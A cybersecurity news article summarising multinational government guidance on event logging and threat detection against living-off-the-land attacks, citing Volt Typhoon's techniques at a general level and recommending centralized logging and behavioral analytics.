Event Logging Key to Detecting LOTL Attacks, Security Agencies Say
Several U.S. security agencies and their counterparts from more than a half-dozen other countries are urging organizations to bolster their event logging capabilities to better detect cyberthreats as increasing numbers of threat groups are using living-off-the-land (LOTL) techniques in their attacks.
The FBI, CISA, and National Security Agency (NSA) are among the international government bodies the outlined steps public and private entities can take to improve their event-logging capabilities in the face of cybercriminal organizations using tactics to avoid being detected while running their attacks.
“The increased prevalence of malicious actors employing LOTL techniques, such as LOTL binaries (LOLBins) and fileless malware, highlights the importance of implementing and maintaining an effective event logging solution,” the agencies wrote in the report “Best Practices for Event Logging and Threat Detection,” released this month. “Advanced Persistent Threats (APTs) are employing LOTL techniques to evade detection. The purpose of this publication is to detail best practice guidance for event logging and threat detection for cloud services, enterprise networks, enterprise mobility, and operational technology (OT) networks.”
Other cyber agencies signing onto the 17-page report include those from Canada, the Netherlands, the UK, South Korea, Singapore, New Zealand, and Japan.
Taking Advantage of What’s Available
Bad actors running LOTL attacks abuse tools already existing on targeted systems to get around security tools rather than deploying malicious code, making it more difficult to detect and mitigate the threats. According to a report issued earlier this year by a similar group of U.S. and international security agencies, such techniques can be used in on-premises, cloud, or hybrid environments and often are leveraged by state-sponsored threat groups from China and Russia.
“LOTL enables threat actors to conduct their operations discreetly as they can camouflage activity with typical system and network behavior, potentially circumventing basic endpoint security capabilities,” they wrote.
In a threat report in May, Honeywell noted the growing use of LOTL strategies in attacks on industrial systems and critical infrastructure facilities by targeting security vulnerabilities in documents and using scripting and command-line techniques.
Volt Typhoon Lives Off the Land
In the recent event logging report, the agencies pointed to the high-profiled gang Volt Typhoon, noting that since mid-2021, the Chinese state-sponsored threat group has targeted critical infrastructure organizations relying almost exclusively on LOTL techniques. That’s included using PowerShell to discover remote systems, identify user and account names, and enumerate logs to find successful log-ons.
In addition, Volt Typhoon – which CISA earlier this year had already infiltrated networks of U.S.-based critical infrastructure organizations and essentially was lying in wake to disrupt operations if conflicts arise between the United States and China – obtains valid credentials by extracting an Active Directory database file and accesses hashed credentials from the Local Security Authority SubSystem Service (LSASS) process memory space, among other tactics.
A Focus on Event Logging
The report is focused on best practices for event logging and threat detection, though the agencies added that LOTL techniques are featured because they make detecting cyberthreats difficult.
“Developing and implementing an enterprise approved logging policy improves an organisation’s chances of detecting malicious behaviour on their systems and enforces a consistent method of logging across an organisation’s environments,” they wrote. “Useful event logs enrich a network defender’s ability to assess security events to identify whether they are false positives or true positives. Implementing high-quality logging will aid network defenders in discovering LOTL techniques that are designed to appear benign in nature.”
On Linux systems, logs capture the use of curl, systemctl, systemd, Python and other such LOLBins used by malicious actors, while on Window systems, logs can detect the use of LOLBins like Netsh and PowerShell. They also can see command execution, script block logging, and module logging for PowerShell, while in the cloud, they can log all control plane operations, including API calls and end-user logins.
The agencies stressed the need to create an enterprise-approved event logging policy that takes into account shared responsibilities between the organization and service providers, including details of events to be logged, now the logs will be monitored and retained, and facilities to be used. Event logs also should be used widely, including in enterprise networks, operational technology, mobile devices, and the cloud.
“The prioritisation takes into consideration the likelihood that the logged asset will be targeted by a malicious actor, as well as the impact if the asset were to be compromised,” they wrote. “It also prioritises log sources that can assist in identifying LOTL techniques. Please note that this is not an exhaustive list of log sources and their threats, and their priority may differ between organisations.”
Analyzing the Logging Information
Enterprises also need a centralized event logging facility, like a secured data lake, where logs can be aggregated and then processed forward selected logs to analytic tools, like security information and event management (SIEM) and extended detection and reponse (XDR) solutions. A centralized storage capability also ensures that logs won’t be lost from commercial network systems, which tend to have limited local storage.
In addition, organization may need user and entity behavioral analytics tools to automate the detection of behavior anomalies on networks, devices, and accounts, which will help them detect bad actors using LOTL techniques.